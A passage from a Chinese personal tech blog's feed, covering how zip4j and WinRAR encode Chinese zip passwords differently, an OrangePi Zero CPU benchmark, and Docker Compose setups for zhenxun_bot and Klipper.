function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable {</span><br><span class="line"><span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">"测试"</span>;</span><br><span class="line"><span class="type">ZipFile</span> <span class="variable">zipFile</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ZipFile</span>(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\27.zip"</span>);</span><br><span class="line">zipFile.setUseUtf8CharsetForPasswords(<span class="literal">false</span>);</span><br><span class="line">zipFile.setPassword(password.toCharArray());</span><br><span class="line">zipFile.extractAll(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\d"</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这次能成功运行了。<br>运行是成了,但是为什么?通过方法名搜索我们找到了这样一个issue:<a href="https://github.com/srikanth-lingala/zip4j/issues/328">https://github.com/srikanth-lingala/zip4j/issues/328</a> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Using non-ascii characters for passwords is in a grey zone as far as zip specification is concerned. Some tools convert passwords to utf8 and some don't. With the change that you linked, zip4j converts the password to utf8 by default, and I guess Windows doesn't, and that's why it works fine in your case when you revert the utf8 conversion.</span><br><span class="line"></span><br><span class="line">I added an option to ZipFile api to use utf8 or not for password encoding and decoding. If you are sure that your zip file will only be used on windows, you can now generated the zip files by not using utf8. You can set this flag via ZipFile.setUseUtf8CharsetForPasswords(boolean).</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>意思大概是zip4j在遇到中文密码的时候会先把密码转UTF-8,但是windows不会。这解决了我第一个疑问,下面我们来研究第二个问题:原来的密码究竟被编码成了什么? </p><h3 id="密码便乘变成什么样了?"><a href="#密码便乘变成什么样了?" class="headerlink" title="密码便乘变成什么样了?"></a>密码<del>便乘</del>变成什么样了?</h3><p>我们直接翻阅zip4j的源代码: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/ZipFile.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setUseUtf8CharsetForPasswords</span><span class="params">(<span class="type">boolean</span> useUtf8CharsetForPasswords)</span> {</span><br><span class="line"> <span class="built_in">this</span>.useUtf8CharsetForPasswords = useUtf8CharsetForPasswords;</span><br><span class="line"> }</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>继续跟: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/crypto/StandardDecrypter.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">init</span><span class="params">(<span class="type">byte</span>[] headerBytes, <span class="type">char</span>[] password, <span class="type">long</span> lastModifiedFileTime, <span class="type">long</span> crc,</span></span><br><span class="line"><span class="params"> <span class="type">boolean</span> useUtf8ForPassword)</span> <span class="keyword">throws</span> ZipException {</span><br><span class="line"> <span class="keyword">if</span> (password == <span class="literal">null</span> || password.length <= <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">ZipException</span>(<span class="string">"Wrong password!"</span>, ZipException.Type.WRONG_PASSWORD);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> zipCryptoEngine.initKeys(password, useUtf8ForPassword);</span><br></pre></td></tr></table></figure><p>继续: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/crypto/engine/ZipCryptoEngine.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">initKeys</span><span class="params">(<span class="type">char</span>[] password, <span class="type">boolean</span> useUtf8ForPassword)</span> {</span><br><span class="line"> keys[<span class="number">0</span>] = <span class="number">305419896</span>;</span><br><span class="line"> keys[<span class="number">1</span>] = <span class="number">591751049</span>;</span><br><span class="line"> keys[<span class="number">2</span>] = <span class="number">878082192</span>;</span><br><span class="line"> <span class="type">byte</span>[] bytes = convertCharArrayToByteArray(password, useUtf8ForPassword);</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">byte</span> b : bytes) {</span><br><span class="line"> updateKeys((<span class="type">byte</span>) (b & <span class="number">0xff</span>));</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>来了: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/util/Zip4jUtil.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] convertCharArrayToByteArray(<span class="type">char</span>[] charArray, <span class="type">boolean</span> useUtf8Charset) {</span><br><span class="line"> <span class="keyword">return</span> useUtf8Charset</span><br><span class="line"> ? convertCharArrayToByteArrayUsingUtf8(charArray)</span><br><span class="line"> : convertCharArrayToByteArrayUsingDefaultCharset(charArray);</span><br><span class="line">}</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="type">byte</span>[] convertCharArrayToByteArrayUsingDefaultCharset(<span class="type">char</span>[] charArray) {</span><br><span class="line"> <span class="type">byte</span>[] bytes = <span class="keyword">new</span> <span class="title class_">byte</span>[charArray.length];</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i < charArray.length; i++) {</span><br><span class="line"> bytes[i] = (<span class="type">byte</span>) charArray[i];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> bytes;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>我们把这段代码复制下来,然后再找一段将输出转为HEX的代码,组合起来试着运行看看: </p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnZip</span> {</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable {</span><br><span class="line"><span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">"克拉拉"</span>;</span><br><span class="line"></span><br><span class="line">System.out.println(password.toCharArray());</span><br><span class="line"></span><br><span class="line"><span class="type">byte</span>[] encbytes = <span class="keyword">new</span> <span class="title class_">byte</span>[password.toCharArray().length];</span><br><span class="line"><span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i < password.toCharArray().length; i++) {</span><br><span class="line">encbytes[i] = (<span class="type">byte</span>) password.toCharArray()[i];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">System.out.println(bytesToHex(encbytes));</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">char</span>[] HEX_ARRAY = <span class="string">"0123456789ABCDEF"</span>.toCharArray();</span><br><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> String <span class="title function_">bytesToHex</span><span class="params">(<span class="type">byte</span>[] bytes)</span> {</span><br><span class="line"> <span class="type">char</span>[] hexChars = <span class="keyword">new</span> <span class="title class_">char</span>[bytes.length * <span class="number">2</span>];</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">j</span> <span class="operator">=</span> <span class="number">0</span>; j < bytes.length; j++) {</span><br><span class="line"> <span class="type">int</span> <span class="variable">v</span> <span class="operator">=</span> bytes[j] & <span class="number">0xFF</span>;</span><br><span class="line"> hexChars[j * <span class="number">2</span>] = HEX_ARRAY[v >>> <span class="number">4</span>];</span><br><span class="line"> hexChars[j * <span class="number">2</span> + <span class="number">1</span>] = HEX_ARRAY[v & <span class="number">0x0F</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">String</span>(hexChars);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>输出: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">克拉拉</span><br><span class="line">4BC9C9</span><br></pre></td></tr></table></figure><p>好,那么这个<code>4B C9 C9</code>是个什么东西?<br>我们打开winhex,直接打进去看看:<br><img src="/pictures/chinese-zip-password/8.png"><br>好,复制粘贴到WinRAR:<br><img src="/pictures/chinese-zip-password/9.png"><br><img src="/pictures/chinese-zip-password/10.png"> </p><p>好,完工,又是涨奇怪知识的一天。</p>]]></content>
<summary type="html"><h3 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h3><p><strong>某天,我的朋友在QQ上转发给我了一个带密码的Zip压缩包</strong><br><img src="/pictures/chinese-zip-password/1.png"></p>
<p>我看了一眼,双击后默认用WinRAR打开了,然后复制粘贴密码:<br><img src="/pictures/chinese-zip-password/2.png"></p>
<p>啊?密码错误?</p>
<hr></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>OrangePi Zero CPU跑分测试 CPU Benchmark</title>
<link href="https://thinkalone.win/OrangePiZero-CPU-Benchmark.html"/>
<id>https://thinkalone.win/OrangePiZero-CPU-Benchmark.html</id>
<published>2023-12-01T04:00:00.000Z</published>
<updated>2025-03-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:H2+<br>RAM:512M </p><p>(于2025/03重测) </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@OPi-Zero</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P"" """Y$$.". Kernel: armv7l Linux 6.6.75-current-sunxi</span><br><span class="line"> ,$$P' `$$$. Uptime: 1h 41m</span><br><span class="line">',$$P ,ggs. `$$b: Packages: 437</span><br><span class="line">`d$$' ,$P"' . $$$ Shell: bash</span><br><span class="line"> $$P d$' , $$P Disk: 3.8G / 30G (14%)</span><br><span class="line"> $$: $$. - ,d$$' CPU: ARMv7 rev 5 (v7l) @ 4x 1.296GHz</span><br><span class="line"> $$\; Y$b._ _,d$P' GPU:</span><br><span class="line"> Y$$. `.`"Y$$$$P"' RAM: -</span><br><span class="line"> `$$b "-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `"Y$b._</span><br><span class="line"> `""""</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 16.02:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">disappear9@OPi-Zero:~$ 7z b -mmt4</span><br><span class="line"></span><br><span class="line">7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 32000000 - - - - - - - -</span><br><span class="line"></span><br><span class="line">RAM size: 489 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 450 MB, # Benchmark threads: 4</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 1513 347 424 1472 | 44851 396 966 3827</span><br><span class="line">23: 1431 356 410 1459 | 41115 396 899 3557</span><br><span class="line">24: 1305 355 396 1403 | 37626 396 834 3303</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 353 410 1445 | 396 900 3562</span><br><span class="line">Tot: 374 655 2504</span><br><span class="line">disappear9@OPi-Zero:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 64000000 64000000 64000000 - - - - - -</span><br><span class="line"></span><br><span class="line">RAM size: 489 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 435 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 573 100 558 558 | 11927 100 1019 1018</span><br><span class="line">23: 539 100 550 550 | 11765 100 1019 1018</span><br><span class="line">24: 518 100 557 557 | 11506 100 1010 1010</span><br><span class="line">25: 491 100 562 561 | 11200 100 997 997</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 100 557 557 | 100 1011 1011</span><br><span class="line">Tot: 100 784 784</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">disappear9@OPi-Zero:~$ sysbench cpu --cpu-max-prime=20000 --threads=4 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 4</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 74.41</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0407s</span><br><span class="line"> total number of events: 748</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 53.14</span><br><span class="line"> avg: 53.62</span><br><span class="line"> max: 107.58</span><br><span class="line"> 95th percentile: 52.89</span><br><span class="line"> sum: 40104.21</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 187.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 10.0261/0.01</span><br><span class="line"></span><br><span class="line">disappear9@OPi-Zero:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 18.59</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0466s</span><br><span class="line"> total number of events: 187</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 53.17</span><br><span class="line"> avg: 53.71</span><br><span class="line"> max: 106.98</span><br><span class="line"> 95th percentile: 52.89</span><br><span class="line"> sum: 10044.25</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 187.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 10.0442/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:H2+<br>RAM:512M </p>
<p>(于2025&#x2F;03重测) </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@OPi-Zero</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P&quot;&quot; &quot;&quot;&quot;Y$$.&quot;. Kernel: armv7l Linux 6.6.75-current-sunxi</span><br><span class="line"> ,$$P&#x27; `$$$. Uptime: 1h 41m</span><br><span class="line">&#x27;,$$P ,ggs. `$$b: Packages: 437</span><br><span class="line">`d$$&#x27; ,$P&quot;&#x27; . $$$ Shell: bash</span><br><span class="line"> $$P d$&#x27; , $$P Disk: 3.8G / 30G (14%)</span><br><span class="line"> $$: $$. - ,d$$&#x27; CPU: ARMv7 rev 5 (v7l) @ 4x 1.296GHz</span><br><span class="line"> $$\; Y$b._ _,d$P&#x27; GPU:</span><br><span class="line"> Y$$. `.`&quot;Y$$$$P&quot;&#x27; RAM: -</span><br><span class="line"> `$$b &quot;-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `&quot;Y$b._</span><br><span class="line"> `&quot;&quot;&quot;&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>使用 Docker 部署 zhenxun_bot(绪山真寻Bot)</title>
<link href="https://thinkalone.win/zx_bot_Docker.html"/>
<id>https://thinkalone.win/zx_bot_Docker.html</id>
<published>2023-01-10T04:00:00.000Z</published>
<updated>2023-01-10T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h1 id="指路"><a href="#指路" class="headerlink" title="指路"></a>指路</h1><p><a href="https://github.com/D9Lab/zhenxun_bot_docker"><img src="https://shields.io/badge/GITHUB-D9Lab/zhenxun_bot_docker-4476AF?logo=github&style=for-the-badge" alt="Github"></a></p><p><a href="https://github.com/HibiKier/zhenxun_bot"><img src="https://shields.io/badge/GITHUB-HibiKier/zhenxun_bot-4476AF?logo=github&style=for-the-badge" alt="Github"></a></p><h1 id="使用Portainer建立Stacks"><a href="#使用Portainer建立Stacks" class="headerlink" title="使用Portainer建立Stacks"></a>使用Portainer建立Stacks</h1><p>打开Stacks,Add stack 粘贴以下代码 </p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="attr">version:</span> <span class="string">'3.4'</span></span><br><span class="line"></span><br><span class="line"><span class="attr">services:</span></span><br><span class="line"> <span class="attr">go-cqhttp:</span></span><br><span class="line"> <span class="attr">image:</span> <span class="string">silicer/go-cqhttp:latest</span></span><br><span class="line"> <span class="attr">container_name:</span> <span class="string">zxbot_go-cqhttp</span></span><br><span class="line"> <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line"> <span class="attr">volumes:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">go-cqhttp_data:/data</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">bot_data:/bot</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">bot:bot</span> <span class="comment">#配置为ws reverse,地址 ws://bot:8080/onebot/v11/ws</span></span><br><span class="line"></span><br><span class="line"> <span class="attr">postgres:</span></span><br><span class="line"> <span class="attr">image:</span> <span class="string">postgres:14</span></span><br><span class="line"> <span class="attr">container_name:</span> <span class="string">zxbot_postgres</span></span><br><span class="line"> <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line"> <span class="attr">environment:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">POSTGRES_USER=zxbot</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">POSTGRES_PASSWORD=zxbot</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">POSTGRES_DB=zxbot_database</span></span><br><span class="line"> <span class="attr">volumes:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">postgres_data:/var/lib/postgresql/data</span></span><br><span class="line"></span><br><span class="line"> <span class="attr">bot:</span> <span class="comment">#需要将 .env.dev 中的监听地址改为0.0.0.0</span></span><br><span class="line"> <span class="attr">image:</span> <span class="string">ghcr.io/d9lab/zhenxun_bot:latest</span> <span class="comment">#ghcr.io</span></span><br><span class="line"> <span class="comment">#image: d9lab01/zhenxun_bot #DockerHub</span></span><br><span class="line"> <span class="attr">container_name:</span> <span class="string">zxbot_zhenxun_bot</span></span><br><span class="line"> <span class="attr">depends_on:</span> </span><br><span class="line"> <span class="bullet">-</span> <span class="string">postgres</span></span><br><span class="line"> <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line"> <span class="attr">environment:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">SU=114514</span> <span class="comment">#管理员QQ</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">DB=postgres://zxbot:zxbot@postgres:5432/zxbot_database</span></span><br><span class="line"> <span class="attr">volumes:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">bot_data:/bot</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">postgres:postgres</span></span><br><span class="line"></span><br><span class="line"><span class="attr">volumes:</span> </span><br><span class="line"> <span class="attr">bot_data:</span></span><br><span class="line"> <span class="attr">go-cqhttp_data:</span></span><br><span class="line"> <span class="attr">postgres_data:</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>镜像有问题了开issue,看见了就回。</p>]]></content>
<summary type="html"><h1 id="指路"><a href="#指路" class="headerlink" title="指路"></a>指路</h1><p><a href="https://github.com/D9Lab/zhenxun_bot_docker"><img src="https:</summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>在Docker中运行Klipper</title>
<link href="https://thinkalone.win/klipper-docker.html"/>
<id>https://thinkalone.win/klipper-docker.html</id>
<published>2022-01-25T04:00:00.000Z</published>
<updated>2022-01-25T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h1 id="安装Portainer"><a href="#安装Portainer" class="headerlink" title="安装Portainer"></a>安装Portainer</h1><p><a href="https://docs.portainer.io/v/ce-2.11/start/install">https://docs.portainer.io/v/ce-2.11/start/install</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">docker volume create portainer_data</span><br><span class="line">docker run -d -p 9443:9443 --name portainer \</span><br><span class="line">--restart=always \</span><br><span class="line">-v /var/run/docker.sock:/var/run/docker.sock \</span><br><span class="line">-v portainer_data:/data \</span><br><span class="line">portainer/portainer-ce:lts</span><br></pre></td></tr></table></figure><h1 id="建立Stacks(docker-compose)"><a href="#建立Stacks(docker-compose)" class="headerlink" title="建立Stacks(docker-compose)"></a>建立Stacks(docker-compose)</h1><p><a href="https://github.com/dimalo/klipper-web-control-docker">https://github.com/dimalo/klipper-web-control-docker</a></p><p>打开Stacks,Add stack 粘贴以下代码</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 